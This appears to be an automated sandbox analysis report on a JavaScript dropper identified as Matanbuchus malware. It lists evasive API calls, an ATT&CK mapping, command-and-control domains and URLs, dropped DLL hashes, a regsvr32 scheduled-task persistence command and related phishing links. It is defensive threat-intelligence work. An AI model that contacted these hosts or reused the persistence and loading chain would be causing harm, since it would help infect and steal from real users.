                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D95F0 GetProcessHeap,GetDriveTypeA,4_2_7F2D95F0
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_initJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6C35F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C35F233
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F1665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_7F2F1665
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F1417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_7F2F1417
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F52A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_7F2F52A3
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6B63F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6B63F233
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F731665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_7F731665
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F731417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_7F731417
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F7352A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_7F7352A3
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC41665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_7EC41665
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC41417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_7EC41417
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC452A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_7EC452A3

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.234.216.175 443Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F11CC cpuid 4_2_7F2F11CC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_7F303E2F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_7F30AC51
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_7F30AB82
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_7F30AA7C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_7F30A953
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_7F30A700
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_7F30A675
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_7F30A58F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_7F30A5DA
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_7F30A4E8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_7F3043AE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_7F30A2ED
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F1534 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_7F2F1534
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6B6351C0 DllInstall,GetTempFileNameW,GetFileType,GetSystemDirectoryA,LoadLibraryA,GetUserNameA,lstrlenA,lstrlenA,6_2_6B6351C0
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information2
                  Scripting                  		1
                  Replication Through Removable Media                  		21
                  Windows Management Instrumentation                  		2
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Account Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS36
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion                  		LSA Secrets41
                  Security Software Discovery                  		SSHKeylogging4
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Masquerading                  		Cached Domain Credentials1
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Process Injection                  		Proc Filesystem1
                  System Owner/User Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Rundll32                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570376 Sample: Doc_21-04-53.js Startdate: 06/12/2024 Architecture: WINDOWS Score: 96 47 security-patches.systems 2->47 49 axizlhop.life 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Yara detected Matanbuchus 2->63 65 3 other signatures 2->65 8 msiexec.exe 15 38 2->8         started        12 regsvr32.exe 2->12         started        14 wscript.exe 1 2->14         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 51 axizlhop.life 104.21.40.3, 443, 49730 CLOUDFLARENETUS United States 8->51 37 C:\Users\user\AppData\Roaming\...\libcurl.dll, PE32 8->37 dropped 39 C:\Windows\Installer\MSI68B0.tmp, PE32 8->39 dropped 41 C:\Windows\Installer\MSI6890.tmp, PE32 8->41 dropped 43 2 other files (none is malicious) 8->43 dropped 19 rundll32.exe 8->19         started        21 msiexec.exe 8->21         started        23 regsvr32.exe 8 12->23         started        69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->69 26 regsvr32.exe 10 17->26         started        28 regsvr32.exe 10 17->28         started        file6 signatures7 process8 signatures9 30 rundll32.exe 2 18 19->30         started        35 conhost.exe 21->35         started        67 System process connects to network (likely due to code injection or exploit) 23->67 process10 dnsIp11 53 security-patches.systems 185.234.216.175, 443, 4443, 49731 SPRINT-SDCPL Poland 30->53 45 C:\Users\user\8f08\813848\813848.winmd, PE32 30->45 dropped 55 Found evasive API chain (may stop execution after checking mutex) 30->55 57 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 30->57 file12 signatures13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Doc_21-04-53.js0%ReversingLabs

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\8f08\813848\813848.winmd5%ReversingLabs
                  C:\Users\user\AppData\Roaming\silver\libcurl.dll5%ReversingLabs
                  C:\Windows\Installer\MSI67E2.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI6850.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI6890.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI68B0.tmp0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xml0%Avira URL Cloudsafe
                  https://security-patches.systems/AdminAccounts.aspx0%Avira URL Cloudsafe
                  https://security-patches.systems/verif.aspx0%Avira URL Cloudsafe
                  http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php0%Avira URL Cloudsafe
                  https://axizlhop.life/klog.php0%Avira URL Cloudsafe
                  https://security-patches.systems/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  axizlhop.life
                  		104.21.40.3
                  		truefalse
                    		unknown
                    security-patches.systems
                    		185.234.216.175
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://axizlhop.life/klog.phpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://security-patches.systems/verif.aspxtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.phptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://security-patches.systems/AdminAccounts.aspxtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://security-patches.systems/rundll32.exe, 00000004.00000002.2943141043.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlregsvr32.exefalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.234.216.175
                      		security-patches.systemsPoland
                      		197226SPRINT-SDCPLtrue
                      104.21.40.3
                      		axizlhop.lifeUnited States
                      		13335CLOUDFLARENETUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1570376
                      Start date and time:2024-12-06 22:18:45 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Without Instrumentation
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Doc_21-04-53.js
                      Detection:MAL
                      Classification:mal96.troj.evad.winJS@18/21@5/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .js

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Doc_21-04-53.js

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:19:38API Interceptor1x Sleep call for process: msiexec.exe modified
                      16:20:06API Interceptor53x Sleep call for process: rundll32.exe modified
                      21:19:43Task SchedulerRun new task: {9BDF816E-3AA5-4D58-9D2C-6A06AF9DE38B} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.234.216.175klog.php.msiGet hashmaliciousMatanbuchusBrowse
                      • security-patches.systems/WinDefUpdates/DefenderUpdates/index.php

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      security-patches.systemsklog.php.msiGet hashmaliciousMatanbuchusBrowse
                      • 185.234.216.175

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SPRINT-SDCPLklog.php.msiGet hashmaliciousMatanbuchusBrowse
                      • 185.234.216.175
                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/email.email.panda%C2%ADdoc%C2%AD.net/c/eJxUkE2P2yAQhn-NuWWFARt88CFVY612oypR2m7UywqGwSGJDcLY3c2vryJ1-3EbjeZ99MxrW1Nz4xSxAeYBx_zqbdufVQy8WvbnZ4mHr1v5vX_uDcG2lJxXVAlZk1MLSiPjHKRWYBw4lJZJCRqkEVJZQXzLKBMlo3WpqKz4g6l4zS03pmSmLmVZCIqD9teHqEerbYCHETPx02tOGlCbK7Y5zUiu7SnnOBV8XbCuYJ2O8W8EwlCw7kO_YN3CCt7lcMGx4J8NSlVVAgyKymkGjIKWqBoJ3DlUXIGiDUhX8I6MIXvnQWcfxnsNzgkqLMCqwQZWolF0pTk0K0qZQ7S1QVeTkHo9-tuf0GZ5eheeH9Pm7by_vbzf7PD4ZUdSG09zSoWgIWY_zMOUtXN-7O_-JOHip9-A-fB43HRxdxy-Qfi03b-sbbxIktuPF_8ZV1mnHv_bTPeLpWXkZ0iXKWrAO3SXD-unw3Y8i7e8HH7ki-bz5H4FAAD__zN8qVcGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=4f650edf0fbe63c284330a0c3237efbdcb934f50?Get hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQZ0SJXHBh4xy1QJrAgdMgyCbgZWgRtkRFou0qT18YaHrZDQbzDb7_99rWaINkPrlzT0N-i15vjtunx_Nc993rcr7cH5Zt3O4TI80bLFGBkBXrNArVmFqSVAGENw14FwCtIRCuVihY1FBCxUvkvMYacM0x2FDzyjloQt34oiqpN_G0Hs3gjU9uPVBmcX7Lk3Fk7Il0ns7ETrrLeZwL3BTQFtCacfyDuNQX0H7qF9BeoMA2pyMNBf5HygF3aEMVlOCukaJBAUII5AqxaSyEiqRyBbZsSDmG6EyOabjVwA1BjRJWQflyVUniK2mNWwWrZOld8KoOLE0HM8SP31Aks8XnL92iWvXuuuHu8WX3umOTns1woNOpqMpzTmM0IdqJbvZsokucf-H2-rw8zN-_3t_9oIeXfrffbPaqYll_BvxrXGUzHeifzXy7uGhg1zQd59E4uj192kkv3bel-_j_kK--n6-b5t39DAAA__9AXKZYGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=e9c21c3bf4f951c78573525553193377b2f4e89c?Get hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=2126fee3194112970cb23c51d0c56249323ace2bGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      CLOUDFLARENETUShttps://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousUnknownBrowse
                      • 104.21.16.114
                      https://wrx.dzpvwobr.ru/Get hashmaliciousUnknownBrowse
                      • 172.67.211.61
                      https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                      • 104.26.9.44
                      https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KLGet hashmaliciousUnknownBrowse
                      • 104.18.95.41
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 172.67.165.166
                      https://t.ly/DDbriGet hashmaliciousUnknownBrowse
                      • 104.20.6.133
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.16.9
                      https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.comGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                      • 104.19.229.21
                      https://hujalconcretos.com/nppGet hashmaliciousUnknownBrowse
                      • 104.18.11.207

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      28a2c9bd18a11de089ef85a160da29e4https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 104.21.40.3
                      https://wrx.dzpvwobr.ru/Get hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                      • 104.21.40.3
                      https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KLGet hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      https://t.ly/DDbriGet hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      https://inovamora.com/team/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 104.21.40.3
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 104.21.40.3
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.40.3
                      37f463bf4616ecd445d4a1937da06e19klog.php.msiGet hashmaliciousMatanbuchusBrowse
                      • 185.234.216.175
                      resume.docx.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                      • 185.234.216.175
                      apilibx64.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                      • 185.234.216.175
                      Fortexternal.exeGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      Setup.msiGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      Document_PDF.vbsGet hashmaliciousFormBookBrowse
                      • 185.234.216.175
                      Pr9cqW75nY.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      G3vWD786PN.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Windows\Installer\MSI67E2.tmpklog.php.msiGet hashmaliciousMatanbuchusBrowse
                        fes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                          zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                            merd.msiGet hashmaliciousUnknownBrowse
                              medk.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                lavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                  Document-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                    Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                      FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                        C:\Users\user\AppData\Roaming\silver\libcurl.dllklog.php.msiGet hashmaliciousMatanbuchusBrowse
                                          C:\Users\user\8f08\813848\813848.winmdklog.php.msiGet hashmaliciousMatanbuchusBrowse

                                            Created / dropped Files

                                            C:\Config.Msi\4f68dc.rbs

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1355
                                            Entropy (8bit):5.735918190779132
                                            Encrypted:false
                                            SSDEEP:24:hOg4BtTUTXNT6TYggmbtMpUvfUFPe9lW0DhiSVzDfvQsDpD6:USTQ0KstPID8SVf3lD6
                                            MD5:34358AD45A20C542A030786762B32831
                                            SHA1:852D966D2B6107A29C463E03DAB7BF6A5D0C7149
                                            SHA-256:7B9C7351BFDA95D36C6C44FAEED7C9EDD322F24CE94F3DB30E3BC7C728669CCD
                                            SHA-512:DDAF2C24E2DC75B68A06901C943C3ABE51B0312A3BFD7F44F6699AF74BE1A76870DCC28A237B320C094ACF29F85278429BA0F9FB086971F2FD53AB7B06E8AACC
                                            Malicious:false
                                            Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..&.C:\Users\user\AppData\Roaming\silver\....1.C:\Users\user\AppData\Roaming\silver\libcurl.dll....WriteRegistryValues..Writing system registry v

                                            C:\Users\user\8f08\813848\813848.winmd

                                            Download File
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):319488
                                            Entropy (8bit):6.566831510478186
                                            Encrypted:false
                                            SSDEEP:6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
                                            MD5:AD47745AB2AEB60334491BA213BDCF73
                                            SHA1:8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
                                            SHA-256:394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                                            SHA-512:9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\813848\813848.winmd, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Joe Sandbox View:
                                            • Filename: klog.php.msi, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\silver\libcurl.dll

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):319488
                                            Entropy (8bit):6.566831510478186
                                            Encrypted:false
                                            SSDEEP:6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
                                            MD5:AD47745AB2AEB60334491BA213BDCF73
                                            SHA1:8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
                                            SHA-256:394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
